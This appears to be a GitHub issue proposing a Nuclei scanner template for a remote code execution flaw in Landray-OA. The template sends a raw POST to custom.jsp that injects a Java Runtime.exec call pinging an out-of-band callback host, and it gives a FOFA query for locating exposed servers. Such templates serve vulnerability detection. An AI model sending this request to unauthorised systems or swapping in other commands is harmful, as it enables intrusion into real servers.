### ISSUE TITLE
Landray-OA - erp_data.jsp RCE

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7993]
### Template Information:

Landray-OA - erp_data.jsp RCE
app="Landray-OA系统"

### Nuclei Template:

```yaml
id: landray-oa-erp-data-rce

info:
  name: Landray-OA - erp_data.jsp RCE
  author: SleepingBag945
  severity: critical
  description: Landray-OA - erp_data.jsp RCE
  reference:
    - https://cn-sec.com/archives/1249492.html
  metadata:
    fofa-query: app="Landray-OA系统"
  tags: landray,rce


http:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -c 4 {{interactsh-url}}");



    matchers:
      - type: word
        part: interactsh_protocol
        name: http
        words:
          - "dns"
          - "http"
```
